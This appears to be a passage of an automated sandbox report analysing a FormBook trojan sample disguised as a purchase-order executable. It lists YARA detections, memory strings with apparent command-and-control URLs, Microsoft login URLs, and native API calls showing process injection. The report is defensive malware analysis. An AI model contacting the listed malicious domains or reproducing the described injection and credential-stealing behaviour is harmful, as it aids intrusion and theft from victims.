Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Sep 2024 11:05:00 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: CjeBlighAyoJst.exe, 00000006.00000002.3889597488.0000000004BD7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top
            Source: CjeBlighAyoJst.exe, 00000006.00000002.3889597488.0000000004BD7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.mizuquan.top/ed2j/
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RMActivate_ssp.exe, 00000004.00000002.3888738930.00000000041D2000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000002.3887944910.0000000003622000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RMActivate_ssp.exe, 00000004.00000002.3886865804.00000000005A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RMActivate_ssp.exe, 00000004.00000003.2478643383.00000000074C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RMActivate_ssp.exe, 00000004.00000002.3890715735.00000000074EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: RMActivate_ssp.exe, 00000004.00000002.3888738930.0000000004040000.00000004.10000000.00040000.00000000.sdmp, CjeBlighAyoJst.exe, 00000006.00000002.3887944910.0000000003490000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.mfgamecompany.shop/lwt6/?OJ=btRp&nR=j/d5AuZ
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00AE7099
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE7294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00AE7294
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AE7099 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00AE7099
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD4342 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00AD4342
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AFF5D0 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00AFF5D0

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2243312339.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3889597488.0000000004B70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3886646848.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3887684924.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2243639009.00000000039F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3887626598.00000000006D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2244045785.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3887789383.0000000003A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: Purchase Order TE- 00011-7777.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C863 NtClose,2_2_0042C863
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D34340 NtSetContextThread,LdrInitializeThunk,4_2_02D34340
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D34650 NtSuspendThread,LdrInitializeThunk,4_2_02D34650
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32AD0 NtReadFile,LdrInitializeThunk,4_2_02D32AD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32AF0 NtWriteFile,LdrInitializeThunk,4_2_02D32AF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02D32BF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32BE0 NtQueryValueKey,LdrInitializeThunk,4_2_02D32BE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_02D32BA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32B60 NtClose,LdrInitializeThunk,4_2_02D32B60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02D32EE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_02D32E80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32FE0 NtCreateFile,LdrInitializeThunk,4_2_02D32FE0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32FB0 NtResumeThread,LdrInitializeThunk,4_2_02D32FB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32F30 NtCreateSection,LdrInitializeThunk,4_2_02D32F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02D32CA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02D32C70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32C60 NtCreateKey,LdrInitializeThunk,4_2_02D32C60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32DD0 NtDelayExecution,LdrInitializeThunk,4_2_02D32DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02D32DF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02D32D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02D32D30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D335C0 NtCreateMutant,LdrInitializeThunk,4_2_02D335C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D339B0 NtGetContextThread,LdrInitializeThunk,4_2_02D339B0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32AB0 NtWaitForSingleObject,4_2_02D32AB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32B80 NtQueryInformationFile,4_2_02D32B80
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32EA0 NtAdjustPrivilegesToken,4_2_02D32EA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32E30 NtWriteVirtualMemory,4_2_02D32E30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32F90 NtProtectVirtualMemory,4_2_02D32F90
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32FA0 NtQuerySection,4_2_02D32FA0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32F60 NtCreateProcessEx,4_2_02D32F60
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32CC0 NtQueryVirtualMemory,4_2_02D32CC0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32CF0 NtOpenProcess,4_2_02D32CF0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32C00 NtQueryInformationProcess,4_2_02D32C00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32DB0 NtEnumerateKey,4_2_02D32DB0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D32D00 NtSetInformationFile,4_2_02D32D00
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D33090 NtSetValueKey,4_2_02D33090
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D33010 NtOpenDirectoryObject,4_2_02D33010
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D33D70 NtOpenThread,4_2_02D33D70
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_02D33D10 NtOpenProcessToken,4_2_02D33D10
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00149020 NtDeleteFile,4_2_00149020
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_001490C0 NtClose,4_2_001490C0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00149220 NtAllocateVirtualMemory,4_2_00149220
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00148DD0 NtCreateFile,4_2_00148DD0
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_00148F30 NtReadFile,4_2_00148F30
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exeCode function: 4_2_0094F13A NtQueryInformationProcess,4_2_0094F13A
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD70AE: CreateFileW,DeviceIoControl,CloseHandle,0_2_00AD70AE
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ACB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00ACB9F1
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00AD82D0
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AA2B400_2_00AA2B40
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ABBDF60_2_00ABBDF6
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A9A0C00_2_00A9A0C0
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB01830_2_00AB0183
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AD220C0_2_00AD220C
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A985300_2_00A98530
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A966700_2_00A96670
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB06770_2_00AB0677
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AC87790_2_00AC8779
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AFA8DC0_2_00AFA8DC
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB0A8F0_2_00AB0A8F
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A96BBC0_2_00A96BBC
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A98CA00_2_00A98CA0
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ABAC830_2_00ABAC83
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AAAD5C0_2_00AAAD5C
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AC4EBF0_2_00AC4EBF
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB0EC40_2_00AB0EC4
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AF30AD0_2_00AF30AD
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AC113E0_2_00AC113E
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB12F90_2_00AB12F9
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AC542F0_2_00AC542F
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AFF5D00_2_00AFF5D0
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AA36800_2_00AA3680
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AC599F0_2_00AC599F
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ABDA740_2_00ABDA74
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A9DCD00_2_00A9DCD0
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A9BDF00_2_00A9BDF0
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00A95D320_2_00A95D32
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AB1E5A0_2_00AB1E5A
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ADBFB80_2_00ADBFB8
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00AC7FFD0_2_00AC7FFD
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_00ABDF690_2_00ABDF69
            Source: C:\Users\user\Desktop\Purchase Order TE- 00011-7777.exeCode function: 0_2_013BD5780_2_013BD578
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004189132_2_00418913
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004019A72_2_004019A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101CA2_2_004101CA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004101D32_2_004101D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004011F02_2_004011F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416ADE2_2_00416ADE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416AE32_2_00416AE3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B1D2_2_00402B1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402B202_2_00402B20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004103F32_2_004103F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E4732_2_0040E473
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035162_2_00403516
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004035202_2_00403520
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042EE632_2_0042EE63
